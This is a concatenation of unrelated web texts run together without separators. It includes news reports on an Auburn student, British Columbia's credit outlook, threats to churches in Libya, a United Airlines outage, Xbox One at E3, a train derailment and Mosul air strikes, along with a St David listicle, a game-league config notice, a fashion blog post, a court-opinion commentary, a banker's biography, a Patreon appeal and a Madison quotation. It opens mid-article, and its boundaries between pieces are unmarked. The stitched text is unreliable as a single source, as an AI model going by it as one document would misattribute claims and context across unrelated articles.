Auburn athletic director Jay Jacobs and Alabama Lieutenant Governor Kay Ivey , an Auburn alum , are among the growing list of people thanking Taylor for her actions .
`` Your willingness to confront the man and your bravery in pursuing him speak volumes about your character , '' Ivey wrote in a letter to Taylor . `` You are certainly a role model for people everywhere . ''
Auburn asks fans to refrain from rolling damaged oak tree at Toomer 's Corner The oak tree along Magnolia Avenue was scorched late Saturday night when it was intentionally set on fire .
McGowan , also a junior at Auburn , still has a hard time believing his girlfriend of five months so fearlessly went after Wiest .
`` I would have to say this was not on the agenda for the night , '' McGowan said . `` I knew she was aggressive and I knew she had spunked but boy did I not expect her to go grab him by the shoulder by the corner and then when he shrugged her off and started to run across I was like , 'OK that may be it , ' but no she kept going after him . ... I was proud of her . I could not believe that she did that . ''
Taylor , whose sunglasses were lost amid the ordeal but were later recovered and since returned , hopes Wiest faces whatever punishment the justice system deems fit .
`` I just wanted him to have to acknowledge his actions , '' she said , `` and pay for it . ''
1 David was born in the 6th century
The exact date of his birth is unknown , but David is said to have been born around the year 520 – some 1,500 years ago . He was reputedly born on the Pembrokeshire cliffs during a wild thunderstorm .
Advertisement
2 He had an unlikely parentage
Story has it that David was the son of Sant ( aka Sanctus ) , king of Ceredigion and a nun named Nonnita ( Non ) .
3 David founded a monastery
As a young man , David became a monk . He is said to have founded a monastery in around the year 560 , close to the place where he was born . The surrounding area ( in Pembrokeshire , west Wales ) is now known simply as ‘ St Davids ' . It 's believed that St Davids Cathedral and St Davids Bishop 's Palace are built on the site of the original monastery .
Read more : History explore : The wonder of medieval cathedrals
The last Welsh Prince of Wales﻿
4 Britain 's smallest city is named after him
The existence of the cathedral means that St Davids is Britain 's smallest city , with a population of roughly 1,600 – compared to an estimated 358,000 in Wales 's capital , Cardiff . The tenor Dewi Sant bell in the cathedral weighs 2,700lbs !
5 His diet led to a unique nickname
David became known as Dewi Dyfrwr ( ‘ David the Waterdrinker ' ) because of his modest monk 's diet of bread and water . Even meat and beer were forbidden .
6 David was a miracle maker
According to legend , David was a miracle maker : he was said to have been able to restore a blind man 's sight and bring a child back to life by splashing the boy 's face with tears .
7 He moved mountains
While preaching to a crowd in the village of Llanddewi Brefi , David is thought to have performed his most famous miracle : some of the crowd were finding it difficult to hear the sermon , when a white dove landed on David 's shoulder . As it did , the ground on which he stood is said to have risen up to form a mighty hill , making it possible for the gathering crowd to finally see and hear him . The dove became St David 's emblem , often appearing in his portraits and on stained-glass windows depicting him . Today , a church stands on the crest of the special hill .
Read more : The hidden history of Wales
Bleddyn ap Cynfyn : the first Prince of Wales ?
8 David became famous outside Wales
St David 's influence was not limited to Wales – churches and chapels dedicated to David can also be found in south-west England , Ireland and Brittany .
9 He signed off with a poignant quote
David 's final words to his followers were supposedly : “ Do the little things , the small things you 've seen me doing ” or “ Do the little things that you have heard and seen me do ” .
10 David 's shrine became a pilgrimage site
After St David 's death , a shrine was built in his honour at his cathedral . Pope Callistus II thought of it so highly that he declared to Catholics that two pilgrimages to the shrine was worth one to the Vatican in Rome . By the 12th century , more than 60 churches in Wales had also been dedicated to St David .
Read more : Misha Glenny : “ The anglocentric view we have of British history is unsustainable ”
Wales in the Civil War : the last refuge of monarchy
11 Edward I took St David 's remains back to London
After his 1284 military campaign in Wales , English king Edward I took the head and arm of St David from the cathedral and displayed the remains in London .
12 His name spawned a common Welsh term
The nickname ‘ Taffy ' for a Welshman links back to St David as the original and ultimate Welshman – the term dates to the 17th century and derives from ‘ Dafydd ' , the Welsh for David .
13 David is mentioned by Shakespeare
William Shakespeare name-dropped St David in Henry V. When Fluellen 's English colleague , Pistol , insults the humble leek on St David 's Day , Fluellen insists he eat the national emblem as punishment : “ If you can mock a leek , you can eat a leek ” ( Act V , Scene I ) .
14 He has his own flag
Many people mark St David 's Day on 1 March by wearing a leek or a daffodil , the national emblems of Wales , or by displaying the flag of St David , which features a yellow cross on a black background . The Welsh translation of “ Happy St David 's Day ” is “ Dydd Gŵyl Dewi Hapus ” .
15 Children celebrate his legacy in schools
Schools across Wales hold celebrations , with a number of children dressing in traditional costume – a black hat with white trim ; long skirts and shawls . Many boys , meanwhile , will wear a Welsh rugby or football shirt . Schools across the country will also hold an Eisteddfod ( a traditional festival of Welsh poetry and music ) on this day .
Read more : England and Wales : best of enemies ? ( exclusive to The Library )
The rugby-playing heroes of the First and Second World War
16 St David 's Day is a fantastic time to explore Welsh heritage
A number of Wales 's heritage sites are open for free on St David 's Day 2019 ( Friday 1 March ) , as part of Cadw 's St David 's Day celebrations – including St Davids Bishop 's Palace . To read the full list , click here .
For more information about St David and the free entry programme visit cadw.gov.wales , Like Cadw on Facebook or follow @ CadwWales on Twitter .
Advertisement
This article was originally published by History Extra in March 2017
2016 Winter Season Whitelist and Configs for Highlander
Sun , Jan 3 , 2016 by Kumori
Whitelist updated to v.010116 - Configs updated to v.010316
We have updated the configs and whitelist . You can locate these files under downloads .
The configs will include the following changes :
tf_preround_push_from_damage_enable `` 1 ''
tf_spawn_glows_duration `` 5 ''
The whitelist will include the following changes :
Unbanned Weapons : Baby Face 's Blaster , The Enforcer , The Loose Cannon , The Short Circuit
Banned Weapon : The Machina
Banned Cosmetic : The Grandmaster
Unbanned Taunt : Bad Pipes
Please have the updated configs and whitelist installed on your servers before Week 1 .
News
Maplist
Our maplist has been released and posted here .
Team Placements
We are feverishly working on getting all teams placed in their proper divisions . Schedules for Week 1 will be going out very soon so make sure to check back often !
Reminder to All New and Returning Teams
If your team is not yet placed into a skill division please submit a division change request from your leader panel . After you have been placed into a division and have at least 9 players on your roster , do n't forget to set your team to Ready in your leader panel to be scheduled for matches !
Thank you for your continued patience and patronage !
References : [ Downloads | Server Rules | Server Guide ]
The prominent credit rating agency Moody 's Investors Service has downgraded B.C . 's financial outlook , lowering the province 's debt rating from stable to negative .
Moody 's says the downgrade reflects B.C . 's worsening financial situation .
Recent drops in royalties from resources like coal and natural gas have led to a spike in the deficit , and investors worry about the government 's ability to avoid increasing the overall debt even further .
The province 's second quarterly financial report last month indicated the province 's annual deficit was projected to reach $ 1.47 billion , up from an earlier forecast of $ 1.1 billion .
Given the change in Moody 's rating , the B.C . NDP 's Bruce Ralston said he wonders how Finance Minister Mike de Jong can still claim to be on track to balancing the books .
`` This kind of view of the budget-making process , I think , means it will be increasingly difficult for Mr. de Jong to be taken seriously in his boasts that he 's going to balance the budget . ''
De Jong was not available to comment late Wednesday , but in a statement the finance ministry points out that Moody 's has not downgraded B.C . 's overall AAA credit rating , but applies only to the debt rating category .
Attorney General Shirley Bond , who is also the vice-chair of the Treasury Board , said the downgrade will inspire the provincial government to strengthen spending controls .
Bond says the province will have to demonstrate even more discipline to control spending — while continuing to fund health care , education and critical infrastructure .
Moody 's Assistant Vice President Jennifer Wong said the province is working to hit its fiscal targets and if it 's able to do that the credit rating could be raised back to stable .
Forestry to push B.C . 's economy
The forecast comes as a separate RBC Economics Provincial Outlook suggests B.C . 's economy will be tugged in opposite directions in 2013 — but growth should stay at about the same level as this year .
RBC projects provincial growth at about 2.3 per cent in 2013 , only slightly above the 2.1 per cent forecast for this year , and close to the national average of 2.4 per cent .
Cooling of Metro Vancouver 's sizzling housing market and slower population growth get the blame for putting the brakes on growth , but a stronger U.S. housing market is expected to keep B.C . 's forest sector healthy , pushing B.C . 's economy forward .
RBC economists also predict that foreign investment in the province 's commodity and transportation sectors will form the backbone for development of B.C . 's remote regions in 2013 , and for years to come .
Palm Sunday at Tripoli 's Anglican church is normally a joyous affair , with expatriate Christians parading in the spacious front yard with traditional palm branches . Not this year .
Fearing the attention of Islamist militants after recent attacks on churches and the arrest of dozens of Christians accused of proselytising , the church cancelled last weekend 's planned parade .
`` We usually celebrate with pomp , but I said no , '' said the Rev Vasihar Baskaran , vicar of the church of Christ the King , in Tripoli 's picturesque Old Town , a popular venue for British , American , African and Asian worshippers . `` I thought it was better not to attract the attention of bad elements . I told the congregation : when the service is finished , do n't stand in the churchyard and drink tea and have fun , just go home . ''
It is the same story at the nearby Catholic church of St Francis , which has closed its doors outside service hours after a uniformed gunman shot at a priest on the church steps .
Libya has no recognised Christian community , but the small collection of churches serving foreign residents are braced for trouble at this weekend 's Easter services .
Earlier this month jihadist militants set Benghazi 's Coptic church ablaze with the priest inside it ; his life was saved by local Muslim residents rushing into the flames . That followed the killing of two Egyptian worshippers in the bombing of another Coptic church in Misrata earlier this year . Tripoli 's Coptic church has a 24-hour police guard ; the Greek Orthodox church has closed , its priest returning to Greece after he was shot at outside his home .
Meanwhile , Libya 's defence ministry has begun a crackdown on Christians accused of proselytising , beginning in February with the arrest of an American , an Egyptian , a South African and a South Korean accused of spreading Christian literature in Benghazi .
A further 48 Egyptian Copts were arrested in the same city , triggering protests and the burning of the Libyan flag in Cairo when one of the arrested died in custody .
The arrests were made by the Office of Preventive Security , a defence ministry unit tasked with defending Libya 's Islamic culture .
At its military compound on the outskirts of Benghazi , preventive security commander Abdul Salam Barghathi showed off a collection of Bibles and Christian tracts in English and Arabic that he said were among 55,000 books seized in a raid on an evangelist warehouse .
`` They were printing these in the city . Some of these books were given to children , '' he said .
Barghathi said the arrested Christians were shortly to be released as a `` diplomatic gesture '' . `` Anything that comes from abroad can be an invasion against our ideas and our thoughts , which can be a danger to homeland security , '' he said . `` David Cameron has a famous saying . He said , 'Concerning the homeland security , do n't ask about human rights ' . I saw it on Facebook . ''
A few miles away the city 's Coptic church is a blackened , abandoned ruin . Inside , wrecked furniture lies amid smashed stained glass and charred pews , reeking of smoke and rotting fruit from the ransacked kitchen .
Neighbour Abdul Muhammad said local Muslims saved the life of the priest after militants set the building ablaze . `` We did n't know the priest was inside , then we heard him shouting . One of our guys took his gun and threatened to shoot anyone harming the priest , and we managed to get him out and drive him to the [ Egyptian ] consulate . ''
It is far from clear that jihadist militants enjoy widespread support ; rather , they operate in a security vacuum in a country hamstrung by weak and divided government . The Benghazi church attack , like that by Islamists who killed US ambassador Chris Stevens at the American consulate in September , has triggered revulsion in a city which was the cradle of Libya 's Arab spring revolution . `` Trust me , the Christians are our friends , we get on with them , '' said Muhammad . `` Our revolution was about freedom . ''
Meged Labib , an Egyptian Christian market trader , who showed a small blue cross tattooed on his wrist , agreed . `` Really , we have no troubles with most people in Benghazi , I have Muslim friends here . ''
But he admitted being nervous . `` Our priest fled to Egypt ; I do n't think they will repair the church . For now , we hold services at home . ''
Barghathi insisted his forces would protect churches , and condemned the militant attacks , but advised Christians not to attempt to spread their faith in Libya . `` They should be careful . Anything that touches our religion offends us very badly . I do n't really advise the Egyptians to get another church now . ''
Back in Tripoli , Baskaran insists Easter services will go ahead , albeit with the church door closed . `` We will use the Easter services to pray for Libya . There is so much good in this country , '' he said .
Always looking to expand the wardrobe , I 've had my eye on this unique jacket ever since I saw these images of Bill Cunningham ( RIP ) back in 2013 :
Image : GQ
Not quite a blazer , but still a simple piece of outerwear , this is a “ Chore Coat ” . And it 's a utility coat for the masses .
The chore coat ( or chore jacket , work jacket , etc ) originated in France , and hs had a bit of a resurgence over the last few years . They were typically constructed out of some form of denim , either a heavy indigo'ed version or as a lightweight option in chambray or linen . They usually had two large pockets across the midsection , and one or two chest pockets . Very utilitarian :
Vintage French Chore Coat
Today , chore coats are made in a variety of styles out of almost every fabric you can think of . They all share the same general characteristics : big pockets and buttons to the neck . I really like the idea of adding a chore coat to my lineup . Specifically for days that I do n't want to wear a blazer , but need some sort of non-vest outerwear . One thing is 100 % certain : no matter how cool my chore coat is , I will NEVER be as cool as this guy :
With that said , there are quite a few good ones on the market . I look at these as a ‘ business casual ' type of outerwear , but still very versatile . I would wear this with jeans and boots over an oxford , or as a coat over a sweater and chinos with loafers . Since it 's a coat , get one that is a neutral . Navy blues , tans , or olives . If you want something louder , get a sport coat . Here is the rundown of ones I 'm considering :
From top left :
1 Aether Apparel Bowery Chore Coat : Aether does GREAT work , and this chore coat is no exception . This one falls in the middle – it can be dressed up or dressed down . The zipper on the arm gives it a modern twist , but not in a negative sense .
2 . Apolis Indigo Wool Chore Jacket : This is an iconic interpretation of the chore jacket , and one of the pieces that Apolis is known for . The navy wool formalized this version , so it is good for the dressier type . I 'm leaning towards this one or # 1 .
3 . Copin Chore Coat : Very simple , and tan . Mid-range , essentially a casual jacket that can be worn almost anywhere . Boots and jeans preferred .
4 . J . Crew X Wallace & Barnes Chore Coat : A good , very unconstructed version of the chore coat . Essentially a work shirt with front pockets . For the minimalist .
5 . Iron & Resin Industry Chore Coat : A cool green look , and exposed rivets give it a military vibe . More casual than dressy , this coat ranks low on the ‘ formal ' scale , but high on the ‘ tough and cool ' scale . Do n't sleep on green .
6 . Pointer Brand Duck Chore Coat : This is the duck canvas , tough , roughneck version of the chore coat . For the boot-everyday folks . The thick tan canvas wakes up the Filson and Carhartt senses , and the light lining makes this a little more winter-friendly . The label and the green writing on the buttons are nice touches . I 'm tempted to get one of these and do some modifications : First , wash it about 25 times . Second , have the collar rounded ( like this dude ) :
Beyond these , you can find some vintage models on Etsy that are worth a look .
Remember , folks , it ai n't all blazers and gunboats . Have fun , after you get your chores done .
From Friday 's opinion in Bray v. Planned Parenthood Columbia-Willamette Inc. ( 6th Cir . Mar . 21 , 2014 ) ( paragraph break added ) :
If the facts alleged in the complaint are true , this case involves an incident that is more like home raids by Red Guards during China 's Cultural Revolution than like what we should expect in the United States of America . A surprise raid was made on a judgment debtor 's home to enforce an order of execution on property of the debtor . The order was ostensibly for the purpose of obtaining property of value to be seized , but was obviously focused instead on all means for the debtor to express ideas . The debtor was required to sit on his couch while flak-jacketed U.S . Marshals , along with agents of advocates for moral and political positions that the debtor despised , plus persons with unknown identities and purposes , went through and seized the books and papers , and computers and cameras , of the debtor and his family . The only exception was for children 's books and Bibles . The interior of the home was videotaped . The debtor was not allowed to leave the couch , to go outside , or to call his lawyer , although eventually a marshal called the debtor 's lawyer . This kind of home attack on the ability to convey ideas should not happen in our Republic . It is true that the debtor 's ideas — that it is moral to take violent , illegal action to stop abortions — are repugnant . But it is contrary to our fundamental norms to permit government-sanctioned attacks on the purveyance of ideas , even when those ideas are repugnant .
I should stress again that this opinion is based on the allegations , not any proven facts ; that 's the nature of a decision at this stage of the litigation : When a defendant moves to dismiss a complaint on legal grounds , or when the court of appeals hears an appeal of such a dismissal , the court asks whether the facts as alleged by the plaintiff would be legally sufficient for the plaintiff to win . Only if the answer is yes does the case get on track for trial , which would eventually figure out what the facts were . Still , my sense is that judges do n't use such harsh language , even hedged with “ [ i ] f the facts alleged in the complaint are true , ” unless they think that there 's something to the allegations .
In any event , the Brays lose , though partly on procedural grounds and partly on qualified immunity — “ although some of the actions allegedly carried out by the marshals and not explicitly authorized by the order were not constitutional , that unconstitutionality was not then clearly established with sufficient specificity. ” [ UPDATE : Note also that the Brays had settled and dismissed claims against PPCW ( Planned Parenthood Columbia-Willamette ) and PPCW 's law firm . ] Here was the court 's reasoning for why some of the defendants ' alleged actions were unconstitutional ( if the allegations are true ) :
Because the overwhelming focus of the writ was media and communications property , the relevant constitutional analysis is particularly exacting . The Fourth Amendment originated , in part , as a safeguard for free speech , and “ [ w ] here the materials sought to be seized may be protected by the First Amendment , the requirements of the Fourth Amendment must be applied with scrupulous exactitude. ” Under a “ scrupulous ” application , the Fourth Amendment was violated by the detention of Michael Bray for four hours with no access to outside communications while armed , flakjacketed U.S . Marshals worked with an organization Mr. Bray despised to seize his books and manuscripts ( including books and manuscripts of insignificant market value ) for the ostensible purpose of satisfying a debt . Reasonableness is determined by “ balanc [ ing ] the nature and quality of the intrusion on the individual 's Fourth Amendment interests against the importance of the governmental interests alleged to justify the intrusion. ” Scott v. Harris , 550 U.S. 372 , 383 ( 2007 ) ( internal quotations and citations omitted ) . A detention or search that occurs within the home is subject to particular scrutiny because , among the places and things protected by the Fourth Amendment , “ the home is first among equals . At the Amendment 's very core stands the right of a man to retreat into his own home and there be free from unreasonable government intrusion. ” No countervailing governmental interest justified the four-hour detention of Michael Bray . For one thing , the raid presented none of the operational and safety concerns that may justify seizing the occupants of a home during the execution of a criminal warrant . Allowing Michael Bray to leave his home or to use the telephone would not have threatened the completion of the search . Nor would an unrestrained Michael Bray have presented a safety concern . To the contrary , the marshals ' own actions belie that argument . Had the marshals believed that not restraining Michael Bray risked violence , they would not likely have permitted numerous representatives of PPCW to join in a surprise raid of his home . Inviting multiple representatives from PPCW to join the search did more than undermine the argument that the marshals believed Michael Bray to be a safety threat . In addition , the action violated the Fourth Amendment because it exceeded the writ , which authorized only “ a representative from [ PPCW ] ” to “ be present to assist in the identification of property subject to seizure. ” Contrary to this clear instruction , the marshals permitted not one , but “ numerous ” representatives of the organization to join the raid… . Adding further support to the conclusion that the marshals ' actions violated the Constitution , the presence of multiple unauthorized representatives of PPCW served no valid purpose under the writ . Although the Fourth Amendment does not require that all conduct by an officer within a home be expressly authorized by a court order , it does demand that actions relate to the lawful objectives of the order . PPCW had no articulated expertise in satisfying the ostensible purpose of the writ , identifying valuable goods to satisfy a monetary judgment . Moreover , because the presence of additional representatives of PPCW was not authorized , and because the writ made no provision for the use of a camera , it was a violation of the Fourth Amendment to permit the organization to film the home . A person who is not lawfully present in a home may violate the Constitution by engaging in warrantless filming of the area . The Supreme Court made clear in [ Wilson v. Layne , 526 U.S. 603 , 611 ( 1999 ) ] , that the right to be present in a home does not necessarily entitle police to bring photographers with them . In this case , the unauthorized filming of the Brays ' home was particularly unreasonable because the raid was unannounced and the filming occurred within the home itself . Moreover , because of the location and nature of the filming , the use of the camera posed a heightened risk of intimidating the family and capturing its intimate , unguarded moments . Viewed in the light most favorable to the plaintiffs , the marshals ' asserted actions add support to the argument that the ostensible goal of the raid ( identifying valuable goods to satisfy a monetary judgment ) served as a pretext for intimidating the Brays and identifying disfavored books and papers for confiscation . This inference is particularly strong in light of the writ 's focus on expressive materials of negligible market value . For example , the writ authorized the marshals to seize “ all copies of materials written by [ Michael Bray ] , both in published and unpublished form. ” ( Emphasis added . ) Expressive content can not be targeted for confiscation , for instance under RICO , without a judicial determination that it is unlawful or otherwise intertwined with an illegal enterprise . Similarly , when compensating the victims of a crime , it is presumptively unconstitutional to target the profits associated with publications describing that crime . Of course , the Brays have not raised these specific arguments . Nor have they challenged the underlying writ , the constitutionality of which we therefore do not address . Nonetheless , the Fourth Amendment is not read in a vacuum , and “ [ a ] seizure reasonable as to one type of material in one setting may be unreasonable in a different setting or with respect to another kind of material. ” In light of concerns about free speech and the sanctity of the home , and for the more specific reasons identified above , the marshals ' alleged actions in executing the writ were unreasonable , and they violated the Brays ' rights under the Fourth Amendment .
Thanks for the pointer to reader , and my former local counsel , Michael F. Smith .
Ross Maxwell McEwan ( born 16 July 1957 ) [ 2 ] is a New Zealand banker , who has been the chief executive officer ( CEO ) of The Royal Bank of Scotland Group ( RBS ) , a FTSE 100 company , [ 3 ] since 1 October 2013 , succeeding Stephen Hester . [ 4 ]
Early life and education [ edit ]
McEwan was educated at Hastings Boys ' High School , Hastings , followed by Massey University , where he completed a degree in business studies and human resources , despite having failed an accountancy module twice . [ 4 ] He later earned a master in business administration from the Harvard Business School . [ 5 ]
Career [ edit ]
McEwan 's first top management position was as CEO of Axa New Zealand from 1996 to 2002 . [ 2 ] He had spent the previous ten years at National Mutual New Zealand , [ 2 ] 51 % acquired by Axa in 1995 . McEwan was then appointed CEO of First NZ Securities , the stockbroking arm of First NZ Capital Securities , [ 2 ] [ 6 ] [ 7 ] the New Zealand affiliate of Credit Suisse Group . [ 8 ]
In 2003 [ 2 ] McEwan was hired as group executive for retail banking services for the Commonwealth Bank of Australia ( CBA ) . [ 9 ] He had been expected to become the next CEO of CBA , but was passed over for the post in 2011 . [ 10 ]
McEwan joined RBS in August 2012 as head of retail banking . [ 2 ] He was appointed CEO in October 2013 . It was expected that he would move the bank away from investment banking and reduce its international exposure , to focus more on UK retail banking . [ 6 ]
In February–March 2014 , McEwan attracted press coverage for his view that `` free banking '' ( no current account charges for customers in credit ) would have to end sooner or later , and that this would in turn lead to greater transparency from the banks about how they funded their operations . [ 9 ]
On 25 February 2015 , RBS announced that McEwan would forgo a share award worth £1m saying that he did not want his pay package to `` be a distraction from the task of building a great bank '' . He is still expected to be paid £2.7m despite turning down the award . The announcement came the day before the bank , which is 80 % owned by the UK government , was due to release annual results widely expected to be disappointing following a series of fines by banking regulators for failures including for failing to stop manipulation of the foreign exchange market . [ 11 ]
Personal life [ edit ]
McEwan and his wife Stephanie met through playing basketball , while they were both students at Massey University . She has a degree in food technology and they have two adult daughters . They own a farm in New Zealand . [ 4 ] [ 10 ]
Using Twitter frequently , I found myself struggling to be able to maintain the concentration to read a book ( embarrassing , yes , but I know I 'm not alone ) . Kate Reads Books allows busy people and/or Very Online folx to follow along and either read the book with me , or to substitute the thread for reading the book . Based on feedback from followers , this has increased their reading output , and based on Amazon links , it has increased book sales .
Over the course of the primary and forward , many people , myself included , have found themselves moving left on Twitter . Twitter has introduced users to leftism including articles , podcasts , and more . Enter @ katereadsbks . The account enables the widespread sharing of nonfiction books in the online left which continues to expand people 's understanding of leftist history and theory ; it 's more than just reading a book . Furthermore , reading the book together online enriches the learning happening and community-building of the online left .
happened by chance and timing . I 'd been unemployed going on some time and the new gossip-filled book Shattered was coming out about the Clinton campaign . A kind twitter follower , Chris Burlingame , gifted me the book and as a way to `` pay it forward , '' I decided to live-tweet the book so all my followers could enjoy as well . Also , I decided on a whim , along with a tied twitter poll to back up the decision , to ask for tips for reading and tweeting . Hence , @ katereadsbks was born.After finishing Shattered , I set up a new book-only account , @ katereadsbks . Followers then voted on which book to read next , among various leftist non-fiction , which is the focus of the account . As I read a book , I live-tweet personal responses , annotations , and summaries , along with a screenshot of the text . I then continue to reply to each previous tweet , creating one long thread that summarizes the entire book . Followers often reply with their insights and thoughts , which generates conversation around the content . I consider the Kate Reads Books followers and patrons a community.Kate Reads Books provides a public service and enriches the online leftist community . It 's a valuable project to grow the online left for a couple key reasons : Kate Reads Books has been a very rewarding and exciting project thus far . In order to remain viable , I need to be able to make a living wage to reimburse for the time , content , and commitment . Becoming a patron will allow me to continue this project and will give you some perks for your tips ! Thank you for your follows , favs , rts , endorsements , donations , etc . You 're the reason the account exists and I hope you will join me on the Patreon journey as well.💜 📚katePS potential future projects include collaborations with authors and popular leftists , a website with easier-to-read twitter threads , podcast/s , articles , and beyond ! PPS @ apocalizzy is the artist responsible for both my avi and my header image ; you should follow her on twTwitter commission a piece of art , and become a patron of her art
United Airlines passengers expressed frustration through social media after the airline giant had two separate issues with its computer systems which caused worldwide delays beginning late Thursday . File Photo by Brian Kersey/UPI | License Photo
CHICAGO , Oct. 14 ( UPI ) -- United Airlines had two separate issues with its computer systems beginning late Thursday that caused worldwide delays .
`` As of 3 a.m . ET , the system issue has been resolved . Any delayed flights are resuming and we apologize again for the inconvenience , '' United Airlines said in a tweet Friday .
United Airlines spokeswoman Maddie King that a `` small number of flights '' were affected by the glitches over the computer systems . Previously , the airline told NBC News that 63 flights were affected .
One of the issues involved the airline 's luggage weighing systems . Some people expressed frustration with United on social media .
`` Way to totally not communicate at all United Airlines , '' one apparent passenger wrote on Twitter . `` System was back up for a bit . But we had no pilots . Now we have pilots . But system crashed again . ''
`` What in the world is going on with United Airlines ? '' another Twitter user wrote . `` How does an entire airline 's system meltdown ?
Roger Cheng/CNET
LOS ANGELES -- So , the Xbox One is really good at tracking asteroids -- and not of the video game variety .
The E3 video game conference afforded Microsoft a chance to offer a more detailed look at its next-generation console , with the company pulling back the curtain on some of the more interesting capabilities of the new system .
The early indication suggests the Xbox One will see a massive leap in power , actually see games that smartly use the Kinect 's motion sensor , and work even better as an entertainment hub for the home .
To show off its computational powers , one Microsoft engineer whipped up a basic program to track the movement of asteroids . The Xbox One alone could track 40,000 at one time , or about 10 times the computation power of any last-generation console , according to the engineer .
But the Xbox One 's online connection lets the system tap into the cloud and a much larger set of servers , allowing for `` infinite scalability . '' So you 're not relying just on your system 's processing power , but the power of a separate server farm run by Microsoft .
Developers are looking to exploit this feature , which could mean whole seamless worlds that can be rendered on the Xbox One , thanks in part to the outside server resources .
`` Worlds can become infinitely large , '' according to the engineer . `` You 'll see virtual opponents in tens or hundreds of thousands mapped in real time . ''
Because of the reliance on outside resources , a game can continue to run even if the system is off , allowing friends to interact ( or attack ) your world when you 're off at work or school .
`` Because the cloud persists , the worlds will be able to persist . ''
A Microsoft representative said the Xbox One would require only an average broadband connection to tap into the extra computing power .
Roger Cheng/CNET
Microsoft also created a rudimentary looking first-person shooter to demonstrate the enhancements that come from using the new Kinect . The new motion-sensor is sensitive enough to pick up natural human movements , and one engineer showed off bringing up a shield just by recoiling slightly and moving his arms back . Another feature allowed him to turn on X-ray vision by tapping his temple . Lastly , he was able to `` paint '' targets by waving his fingers and calling for a missile strike .
`` We were impressed by how sensitive the sensors are , '' the engineer said . `` It can understand natural human movement , things gamers naturally do . ''
The engineer said Microsoft was getting developers to create enemies or obstacles that ca n't be overcome by using the controller , but only by using Kinect .
Though Microsoft was largely quiet about games during E3 , the company did talk a little about the entertainment aspects of the Xbox One .
Microsoft also made the best use of its partnership with the NFL , which is a partner for Xbox One . Football fans will be glad to hear about NFL Redzone coming to Xbox One . The engineer showed off the ability to `` snap '' content on the side of the screen . So while you 're watching `` Game of Thrones , '' you can pull up a side bar with NFL statistics .
There 's a separate fantasy-sports component that allows the Xbox One to deliver alerts if a player on your fantasy team scores a touchdown . A Microsoft representative showed off the full fantasy event feed .
`` We 're taking the power of Xbox One and live TV and making it more powerful , '' the representative said .
No injuries were reported after a CN freight train derailed near the Etobicoke North GO station on Thursday .
The train was travelling at a slow speed on the north tracks near Kipling Avenue and Highway 409 when it derailed around 4:30 a.m. , toppling several of the train 's box cars .
The cars were empty at the time , CN said .
David Girdlestone , who was at the scene , said he saw at least 10 train cars on their sides .
Metrolinx spokesperson Anne Marie Aikens said GO train service and UP Express are not affected but a part of the platform may be sectioned off .
Kitchener Line : A CN freight train has derailed near the Etobicoke North # GOStation . # GOTrain service is not affected at this time . ( 1/2 ) — Kitchener Train ( @ GOtransitKT ) March 9 , 2017
The north tracks are not generally used by GO trains .
April 20 , 1795
Of all the enemies of true liberty , war is , perhaps , the most to be dreaded , because it comprises and develops the germ of every other .
War is the parent of armies ; from these proceed debts and taxes ; and armies , and debts , and taxes are the known instruments for bringing the many under the domination of the few .
In war , too , the discretionary power of the Executive is extended ; its influence in dealing out offices , honors and emoluments is multiplied ; and all the means of seducing the minds , are added to those of subduing the force , of the people .
The same malignant aspect in republicanism may be traced in the inequality of fortunes , and the opportunities of fraud , growing out of a state of war , and in the degeneracy of manner and of morals , engendered in both .
No nation can preserve its freedom in the midst of continual warfare .
War is in fact the true nurse of executive aggrandizement . In war , a physical force is to be created ; and it is the executive will , which is to direct it .
In war , the public treasuries are to be unlocked ; and it is the executive hand which is to dispense them .
In war , the honors and emoluments of office are to be multiplied ; and it is the executive patronage under which they are to be enjoyed ; and it is the executive brow they are to encircle .
The strongest passions and most dangerous weaknesses of the human breast ; ambition , avarice , vanity , the honorable or venal love of fame , are all in conspiracy against the desire and duty of peace .
–James Madison , from “ Political Observations , ” April 20 , 1795 in Letters and Other Writings of James Madison , Volume IV , page 491 .
An Iraqi man in the rubble of destroyed houses in Mosul 's al-Jadida area on March 26 , 2017 , after air strikes which reportedly killed civilians
Iraqi civil defence forces and volunteers removed bodies from the rubble of houses on Sunday in a west Mosul area where air strikes reportedly took a devastating toll on civilians .
Hundreds of thousands of civilians are still trapped , caught between advancing Iraqi forces and the Islamic State group jihadists that they are fighting to defeat .
The battle for Mosul
Iraqi officials and witnesses said air strikes killed civilians in the Mosul al-Jadida area in recent days , but the number of victims -- said by some to number in the hundreds -- could not be independently confirmed .
An AFP photographer saw civil defence personnel and volunteers digging through the remains of houses to recover the dead in Mosul al-Jadida , where at least six homes were completely destroyed .
The remains of 12 people -- among them women and children -- were placed in blue plastic body bags .
An Iraqi counterterrorism forces member in Mosul 's al-Jadida area on March 26 , 2017 , following air strikes which reportedly killed civilians
A 45-year-old man who wept as he spoke said he was living with more than 20 relatives in one of the houses that was destroyed .
The man , who did not want to be identified , survived because he was away at the time , but said he was told that an air strike targeted the house where IS had positioned two snipers on the roof .
Several senior Iraqi military officers visited Mosul al-Jadida on Sunday and asked people what had happened , the AFP photographer said .
Brigadier General Yahya Rasool , the spokesman for the Joint Operations Command , said Iraq is investigating reports of civilian deaths in west Mosul .
- Coalition potentially responsible -
`` The defence ministry opened an investigation into this issue , '' Rasool said .
The US-led coalition against IS has indicated that it may have been responsible for at least some of the civilian deaths , and said it is also conducting an investigation .
`` An initial review of strike data ... indicates that , at the request of the Iraqi security forces , the coalition struck ( IS ) fighters and equipment , March 17 , in west Mosul at the location corresponding to allegations of civilian casualties , '' it said in a statement on Saturday .
But that only addresses one day , while Iraqi officials referred to strikes carried out over several .
On Sunday , US Central Command chief General Joseph Votel called recent civilian deaths in Mosul a `` terrible tragedy '' .
`` We are investigating the incident to determine exactly what happened and will continue to take extraordinary measures to avoid harming civilians , '' he said in a statement .
Snipers from the Iraqi forces man their post at the front line of the Old City of Mosul on March 25 , 2017
At the beginning of this month the international alliance had said that `` it is more likely than not , at least 220 civilians have been unintentionally killed by coalition strikes '' , and other incidents were still under investigation .
Two witnesses who have now fled the city said that a building with around 170 people inside was destroyed in Mosul al-Jadida .
Iraqi forces drive down a street on the front line of the Old City of Mosul on March 25 , 2017
One of them said that IS snipers had fired on Iraqi forces , after which an aircraft targeted them with a missile .
An Iraqi brigadier general said that 27 residential buildings had been damaged by multiple days of strikes in west Mosul , and some were completely destroyed .
- Jihadists using human shields -
Some officials from Nineveh province , of which Mosul is the capital , have put the death toll from the strikes in the hundreds , but the number of victims is unclear .
Following the raids , the United Nations called for `` everything possible '' to be done to protect civilians in Mosul .
